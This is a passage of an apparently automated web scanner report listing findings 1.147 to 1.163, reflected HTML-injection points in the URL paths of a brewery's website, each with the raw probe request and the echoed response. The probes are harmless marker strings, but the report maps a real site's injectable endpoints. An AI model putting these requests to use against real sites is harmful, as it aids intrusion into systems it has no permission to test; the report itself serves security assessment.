The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf7c"><a>481ef2418ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook9cf7c"><a>481ef2418ab/content/img/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook9cf7c"><a>481ef2418ab_page" class="facebook9cf7c">
...[SNIP]...

1.147. http://www.ninkasibrewing.com/facebook/content/img/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcbba"><a>275f83cf66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookdcbba"><a>275f83cf66/content/img/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookdcbba"><a>275f83cf66_page" class="facebookdcbba">
...[SNIP]...

1.148. http://www.ninkasibrewing.com/facebook/content/img/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c44"><a>859f4735ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf6c44"><a>859f4735ae1/content/img/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf6c44"><a>859f4735ae1_page" class="facebookf6c44">
...[SNIP]...

1.149. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88bc"><a>053c5e72b0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf88bc"><a>053c5e72b0f/content/img/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf88bc"><a>053c5e72b0f_page" class="facebookf88bc">
...[SNIP]...

1.150. http://www.ninkasibrewing.com/facebook/content/img/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2eb"><a>bc8073585ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbb2eb"><a>bc8073585ab/content/img/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookbb2eb"><a>bc8073585ab_page" class="facebookbb2eb">
...[SNIP]...

1.151. http://www.ninkasibrewing.com/facebook/content/img/skin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5800a"><a>a4b4f8152dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook5800a"><a>a4b4f8152dc/content/img/skin/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook5800a"><a>a4b4f8152dc_page" class="facebook5800a">
...[SNIP]...

1.152. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d20"><a>cbd38bfb8dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf8d20"><a>cbd38bfb8dd/content/img/skin/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf8d20"><a>cbd38bfb8dd_page" class="facebookf8d20">
...[SNIP]...

1.153. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8c"><a>4b90a1eb6c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookacc8c"><a>4b90a1eb6c3/content/img/skin/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookacc8c"><a>4b90a1eb6c3_page" class="facebookacc8c">
...[SNIP]...

1.154. http://www.ninkasibrewing.com/facebook/content/img/skin/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6775"><a>0b1efea915c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc6775"><a>0b1efea915c/content/img/skin/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookc6775"><a>0b1efea915c_page" class="facebookc6775">
...[SNIP]...

1.155. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1f9"><a>3337eb96f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook2b1f9"><a>3337eb96f99/content/img/skin/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook2b1f9"><a>3337eb96f99_page" class="facebook2b1f9">
...[SNIP]...

1.156. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41c9"><a>38407733516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke41c9"><a>38407733516/content/img/skin/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke41c9"><a>38407733516_page" class="facebooke41c9">
...[SNIP]...

1.157. http://www.ninkasibrewing.com/facebook/content/img/skin/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d15"><a>6e87c3abe92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf3d15"><a>6e87c3abe92/content/img/skin/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf3d15"><a>6e87c3abe92_page" class="facebookf3d15">
...[SNIP]...

1.158. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1184"><a>83d2b21934b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka1184"><a>83d2b21934b/content/img/skin/ninkasi-random/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka1184"><a>83d2b21934b_page" class="facebooka1184">
...[SNIP]...

1.159. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0479"><a>259ace437e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc0479"><a>259ace437e4/content/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookc0479"><a>259ace437e4_page" class="facebookc0479">
...[SNIP]...

1.160. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72d"><a>662f9a27440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook3d72d"><a>662f9a27440/content/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook3d72d"><a>662f9a27440_page" class="facebook3d72d">
...[SNIP]...

1.161. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fbed"><a>b1ab901368a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7fbed"><a>b1ab901368a/content/img/skin/ninkasi-random/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook7fbed"><a>b1ab901368a_page" class="facebook7fbed">
...[SNIP]...

1.162. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bee"><a>7966f95bbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook14bee"><a>7966f95bbb5/content/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook14bee"><a>7966f95bbb5_page" class="facebook14bee">
...[SNIP]...

1.163. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af568"><a>e655369a8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookaf568"><a>e655369a8f7/content/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
